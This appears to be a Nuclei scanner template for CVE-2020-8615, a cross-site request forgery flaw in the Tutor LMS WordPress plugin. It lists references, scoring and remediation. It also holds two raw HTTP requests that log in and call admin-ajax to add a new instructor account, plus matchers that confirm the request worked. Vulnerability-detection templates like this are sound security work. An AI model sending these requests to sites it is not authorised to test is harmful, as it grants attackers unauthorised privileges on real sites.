id: CVE-2020-8615 info: name: Wordpress Plugin Tutor LMS 1.5.3 - Cross-Site Request Forgery author: r3Y3r53 severity: medium description: | A CSRF vulnerability in the Tutor LMS plugin before 1.5.3 for WordPress can result in an attacker approving themselves as an instructor and performing other malicious actions (such as blocking legitimate instructors). remediation: update to v.1.5.3 reference: - https://nvd.nist.gov/vuln/detail/CVE-2020-8615 - https://wpscan.com/vulnerability/10058 - http://packetstormsecurity.com/files/156585/WordPress-Tutor-LMS-1.5.3-Cross-Site-Request-Forgery.html - https://wpvulndb.com/vulnerabilities/10058 - https://www.getastra.com/blog/911/plugin-exploit/cross-site-request-forgery-in-tutor-lms-plugin/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N cvss-score: 6.5 cve-id: CVE-2020-8615 cwe-id: CWE-352 epss-score: 0.00658 epss-percentile: 0.77218 cpe: cpe:2.3:a:themeum:tutor_lms:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 2 vendor: themeum product: tutor_lms framework: wordpress publicwww-query: /wp-content/plugins/tutor/ tags: wpscan,packetstorm,cve,cve2023,csrf,wp-plugin,wp,tutor,wordpress variables: user: "{{rand_base(6)}}" pass: "{{rand_base(8)}}" email: "{{randstr}}@{{rand_base(5)}}.com" firstname: "{{rand_base(5)}}" lastname: "{{rand_base(5)}}" http: - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In - | POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded action=add_new_instructor&first_name={{firstname}}&last_name={{lastname}}&user_login={{user}}&email={{email}}&phone_number=1231231231&password={{pass}}&password_confirmation={{pass}}&tutor_profile_bio=Et+tempore+culpa+n&action=tutor_add_instructor cookie-reuse: true matchers: - type: dsl dsl: - 'contains(content_type_2, "application/json")' - 'contains(body_2, "success") && contains(body_2, "true") && contains(body_2, "Instructor has been added successfully")' - 'status_code_2 == 200' condition: and # digest: 4b0a00483046022100d883d7aecdb33347ff9dbebb9ac1cc8abd16fbfff1c4ef24edca2642d33388eb022100de95da63d113783eaa92acdf7bcc09eb00a898943f0fa1f14abfc99cc06e0938:922c64590222798bb761d5b6d8e72950